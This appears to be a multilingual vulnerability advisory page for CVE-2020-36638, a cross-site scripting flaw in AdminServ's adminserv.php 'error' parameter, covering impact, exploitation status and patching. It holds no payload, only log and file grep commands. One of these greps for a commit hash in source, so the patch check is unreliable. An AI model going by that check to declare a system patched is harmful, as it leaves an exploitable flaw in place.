Plateforme
php
Composant
adminserv
CVE-2020-36638 is a cross-site scripting (XSS) vulnerability discovered in Chris92de AdminServ. This issue allows attackers to inject malicious scripts through manipulation of the error argument within the resources/core/adminserv.php file, potentially leading to unauthorized actions within a user's session. The vulnerability affects versions prior to the patch identified as 9a45087814295de6fb3a3fe38f96293665234da1. Note that this vulnerability only impacts products no longer supported by the maintainer.
Successful exploitation of CVE-2020-36638 allows an attacker to inject arbitrary JavaScript code into the AdminServ application. This code can then be executed in the context of a user's browser, potentially enabling the attacker to steal session cookies, redirect users to malicious websites, or deface the application. Given the XSS nature, the impact is primarily focused on user accounts with access to the vulnerable AdminServ interface. The lack of ongoing support increases the risk, as no further security updates are expected, leaving systems vulnerable to exploitation.
CVE-2020-36638 was publicly disclosed in December 2022. There is no indication of active exploitation campaigns targeting this vulnerability at this time. The vulnerability is not listed on the CISA KEV catalog. The lack of active exploitation may be due to the product's unsupported status, limiting its exposure and attractiveness to attackers. Public proof-of-concept code is not readily available.
Systems running Chris92de AdminServ that are still in use, despite the product being unsupported, are at significant risk. This includes organizations that may have inherited legacy systems or are using the software in non-critical environments without realizing the security implications. Shared hosting environments where AdminServ is installed pose a particular risk, as vulnerabilities can affect multiple users.
• php: Examine the resources/core/adminserv.php file for the presence of the patch 9a45087814295de6fb3a3fe38f96293665234da1.
find /path/to/adminserv/ -name "adminserv.php" -print0 | xargs -0 grep -i '9a45087814295de6fb3a3fe38f96293665234da1'• generic web: Monitor access logs for unusual requests targeting resources/core/adminserv.php with potentially malicious parameters.
grep "error=" /path/to/access.logdisclosure
Statut de l'Exploit
EPSS
0.25% (percentile 48%)
Vecteur CVSS
The primary mitigation for CVE-2020-36638 is to apply the patch 9a45087814295de6fb3a3fe38f96293665234da1. Since the product is no longer supported, applying this patch may require manual intervention and careful testing to ensure compatibility with the existing environment. As a temporary workaround, consider implementing strict input validation and output encoding on all user-supplied data processed by adminserv.php. Web application firewalls (WAFs) configured to detect and block XSS payloads can also provide a layer of defense, although they are not a substitute for patching. Verify the patch application by attempting to trigger the XSS vulnerability after applying the fix; the injected script should not execute.
Aplicar el parche 9a45087814295de6fb3a3fe38f96293665234da1 disponible en el repositorio del proyecto. Alternativamente, deshabilitar o eliminar el componente AdminServ si ya no se utiliza, ya que no recibe soporte.
Analyses de vulnérabilités et alertes critiques directement dans votre boîte mail.
CVE-2020-36638 is a cross-site scripting (XSS) vulnerability in Chris92de AdminServ, allowing attackers to inject malicious scripts via the error argument in resources/core/adminserv.php.
You are affected if you are running a version of Chris92de AdminServ prior to the patch 9a45087814295de6fb3a3fe38f96293665234da1.
Apply the patch 9a45087814295de6fb3a3fe38f96293665234da1. Consider input validation and WAF rules as temporary workarounds.
There is no current indication of active exploitation campaigns targeting CVE-2020-36638.
Due to the product being unsupported, a formal advisory may not be available. Refer to the vulnerability description and associated patch information.
Téléverse ton fichier de dépendances et découvre instantanément si cette CVE et d'autres te touchent.